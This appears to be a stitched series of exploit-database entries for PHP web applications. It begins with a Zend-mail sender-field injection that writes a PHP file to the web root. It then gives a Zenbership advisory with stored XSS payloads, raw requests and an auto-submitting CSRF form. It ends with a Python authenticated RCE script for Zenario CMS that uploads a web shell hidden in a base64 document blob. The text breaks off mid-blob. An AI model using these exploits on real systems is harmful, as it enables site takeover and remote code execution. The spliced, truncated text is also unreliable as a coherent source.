Arg no. 7 == ["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
See the full advisory URL for the exploit details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");
// ------------------
// mail() param injection via the vulnerability in zend-mail
chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';
Zend\Loader\AutoloaderFactory::factory(array(
'Zend\Loader\StandardAutoloader' => array(
'autoregister_zf' => true
)
));
Zend\Mvc\Application::init(require 'config/application.php')->run();
$message = new \Zend\Mail\Message();
$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');
$transport = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);
?>
1. ADVISORY INFORMATION
========================================
Title: Zenbership (latest version) - Multiple Vulnerabilities
Application: Zenbership
Class: Sensitive Information disclosure
Versions Affected: <= latest version )
Vendor URL: https://www.zenbership.com/
Software URL: https://www.zenbership.com/Download
Bugs: CSRF / Persistent Cross Site Scripting
Date of found: 23.10.2016
Author: Besim
2.CREDIT
========================================
Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOĞAN
3. VERSIONS AFFECTED
========================================
<= latest version
4. TECHNICAL DETAILS & POC
========================================
PR1 - Stored Cross Site Scripting
========================================
1 ) Admin login admin panel
2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)
3 ) Attacker enter xss payload to last name input
4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)
5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script>
## HTTP Request ##
POST /zenbership/pp-functions/form_process.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
- POST DATA
page=1
&session=zen_0176e737b450bbd83f5fc1066
&first_name=Besim
&last_name=<Script>alert('ExploitDB')</Script>
&email=exploit@yopmail.com
PR2 - CSRF
========================================
1 ) Attacker can add new event with xss payload (stored)
- File : admin/cp-functions/event-add.php
HTTP Request and CSRF PoC
=========================
## HTTP Request ##
POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://site_name/zenbership/admin/index.php?l=events
Content-Length: 1206
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44
Connection: close
- POST DATA
id=JFW996951
&ext=
&edit=0
&event[id]=JFW996951&event[status]=1
&event[name]=<Script>alert('Meryem-ExploitDB');</Script>
&event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p>
&event[post_rsvp_message]=<p>Meryem AKDOGAN</p>
&event[calendar_id]=1
&event[custom_template]=
&tags=
&event[starts]=2016-10-26 00:00:00
&event[ends]=2016-10-28 00:00:00
&event[start_registrations]=2016-10-24 00:00:00
&event[close_registration]=&event[early_bird_end]=
&event[online]=0&event[location_name]=Turkey
&event[url]=&event[address_line_1]=
&event[address_line_2]=&event[city]=
&event[state]=&event[zip]=
&event[country]=
&event[phone]=
&limit_attendees_dud=0
&event[max_rsvps]=
&event[members_only_view]=0
&event[members_only_rsvp]=0
&event[allow_guests]=1
&event[max_guests]=1
&form[col2][Account Overview]=section
&form[col2][company_name]=1
&form[col2][address_line_1]=0
&form[col2][address_line_2]=0
&form[col2][city]=0
&form[col2][state]=0
&form[col2][zip]=0
&form[col2][country]=0
&form[col2][url]=0
## CSRF PoC ##
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/admin/cp-functions/event-add.php" method="POST">
<input type="hidden" name="id" value="OXH978786" />
<input type="hidden" name="ext" value="" />
<input type="hidden" name="edit" value="0" />
<input type="hidden" name="event[id]" value="OXH978786" />
<input type="hidden" name="event[status]" value="1" />
<input type="hidden" name="event[name]" value="<script>alert('Meryem-ExploitDB');</Script>" />
<input type="hidden" name="event[tagline]" value="meryem" />
<input type="hidden" name="event[description]" value="<p>Meryem AKDOGAN</p> " />
<input type="hidden" name="event[post_rsvp_message]" value="<p>Meryem AKDOGAN</p> " />
<input type="hidden" name="event[calendar_id]" value="1" />
<input type="hidden" name="event[custom_template]" value="" />
<input type="hidden" name="tags" value="meryem" />
<input type="hidden" name="event[starts]" value="2016-10-26 00:00:00" />
<input type="hidden" name="event[ends]" value="2016-10-28 00:00:00" />
<input type="hidden" name="event[start_registrations]" value="2016-10-24 00:00:00" />
<input type="hidden" name="event[close_registration]" value="" />
<input type="hidden" name="event[early_bird_end]" value="" />
<input type="hidden" name="event[online]" value="0" />
<input type="hidden" name="event[location_name]" value="Turkey" />
<input type="hidden" name="event[url]" value="" />
<input type="hidden" name="event[address_line_1]" value="" />
<input type="hidden" name="event[address_line_2]" value="" />
<input type="hidden" name="event[city]" value="" />
<input type="hidden" name="event[state]" value="" />
<input type="hidden" name="event[zip]" value="" />
<input type="hidden" name="event[country]" value="" />
<input type="hidden" name="event[phone]" value="" />
<input type="hidden" name="limit_attendees_dud" value="0" />
<input type="hidden" name="event[max_rsvps]" value="" />
<input type="hidden" name="event[members_only_view]" value="0" />
<input type="hidden" name="event[members_only_rsvp]" value="0" />
<input type="hidden" name="event[allow_guests]" value="1" />
<input type="hidden" name="event[max_guests]" value="1" />
<input type="hidden" name="form[col2][Account Overview]" value="section" />
<input type="hidden" name="form[col2][company_name]" value="1" />
<input type="hidden" name="form[col2][address_line_1]" value="0" />
<input type="hidden" name="form[col2][address_line_2]" value="0" />
<input type="hidden" name="form[col2][city]" value="0" />
<input type="hidden" name="form[col2][state]" value="0" />
<input type="hidden" name="form[col2][zip]" value="0" />
<input type="hidden" name="form[col2][country]" value="0" />
<input type="hidden" name="form[col2][url]" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Exploit Title: Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/02/2022
# Exploit Author: minhnq22
# Vendor Homepage: https://zenar.io/
# Software Link: https://zenar.io/download-page
# Version: 9.0.54156
# Tested on: Ubuntu 21.04
# CVE : CVE-2021–42171
# Python3
import os
import sys
import json
import uuid
import base64
import requests
# Input
if len(sys.argv) != 4:
print("Usage: " + sys.argv[0] + " 'http(s)://TARGET/zenario' 'USERNAME' 'PASSWORD'")
exit(1)
TARGET = sys.argv[1]
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]
## Attempt to log in
### Get cookie
resp = requests.get(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D")
### Grab the PHP session ID
PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]
### Authen with cookie
resp = requests.post(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D",
headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID},
data={"_validate": "true", "_box": '{"tab":"login","tabs":{"login":{"edit_mode":{"on":1},"fields":{"reset":{"_was_hidden_before":true},"description":{},"username":{"current_value":"' + USERNAME + '"},"password":{"current_value":"' + PASSWORD + '"},"admin_login_captcha":{"_was_hidden_before":true,"current_value":""},"remember_me":{"current_value":false},"login":{"pressed":true},"forgot":{"pressed":false},"previous":{"pressed":false}}},"forgot":{"edit_mode":{"on":1},"fields":{"description":{},"email":{"current_value":""},"previous":{},"reset":{}}}},"path":"login"}'})
# If login OK
print("Login OK!")
## Upload web shell
### Get sync info
resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload",
headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
data={"_fill": "true", "_values": ""})
resp_body = json.loads(resp.text)
password_sync = resp_body["_sync"]["password"]
iv_sync = resp_body["_sync"]["iv"]
cache_dir_sync = resp_body["_sync"]["cache_dir"]
### Create blank docx file
file_content = b"UEsDBBQABgAIAAAAIQDfpNJsWgEAACAFAAATAAgCW0NvbnRlbnRfVHlwZXNdLnhtbCCiBAIooAAC\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0\nlMtuwjAQRfeV+g+Rt1Vi6KKqKgKLPpYtUukHGHsCVv2Sx7z+vhMCUVUBkQpsIiUz994zVsaD0dqa\nbAkRtXcl6xc9loGTXmk3K9nX5C1/ZBkm4ZQw3kHJNoBsNLy9GUw2ATAjtcOSzVMKT5yjnIMVWPgA\njiqVj1Ykeo0zHoT8FjPg973eA5feJXApT7UHGw5eoBILk7LXNX1uSCIYZNlz01hnlUyEYLQUiep8\n6dSflHyXUJBy24NzHfCOGhg/mFBXjgfsdB90NFEryMYipndhqYuvfFRcebmwpCxO2xzg9FWlJbT6\n2i1ELwGRztyaoq1Yod2e/ygHpo0BvDxF49sdDymR4BoAO+dOhBVMP69G8cu8E6Si3ImYGrg8Rmvd\nCZFoA6F59s/m2NqciqTOcfQBaaPjP8ber2ytzmngADHp039dm0jWZ88H9W2gQB3I5tv7bfgDAAD/\n/wMAUEsDBBQABgAIAAAAIQAekRq37wAAAE4CAAALAAgCX3JlbHMvLnJlbHMgogQCKKAAAgAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArJLBasMw\nDEDvg/2D0b1R2sEYo04vY9DbGNkHCFtJTBPb2GrX/v082NgCXelhR8vS05PQenOcRnXglF3wGpZV\nDYq9Cdb5XsNb+7x4AJWFvKUxeNZw4gyb5vZm/cojSSnKg4tZFYrPGgaR+IiYzcAT5SpE9uWnC2ki\nKc/UYySzo55xVdf3mH4zoJkx1dZqSFt7B6o9Rb6GHbrOGX4KZj+xlzMtkI/C3rJdxFTqk7gyjWop\n9SwabDAvJZyRYqwKGvC80ep6o7+nxYmFLAmhCYkv+3xmXBJa/ueK5hk/Nu8hWbRf4W8bnF1B8wEA\nAP//AwBQSwMEFAAGAAgAAAAhAJdANEq+AgAAvQoAABEAAAB3b3JkL2RvY3VtZW50LnhtbKSW227b\nMAxA3wfsHwK/t7KdxEmNpkW7dkMfBhTr9gGKLNtCrQsk5bavH+X75q5w3BdbIs0jiiJpXd8eeTHb\n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\nsbXNDsdGbl+7tivM3skxuAu3ks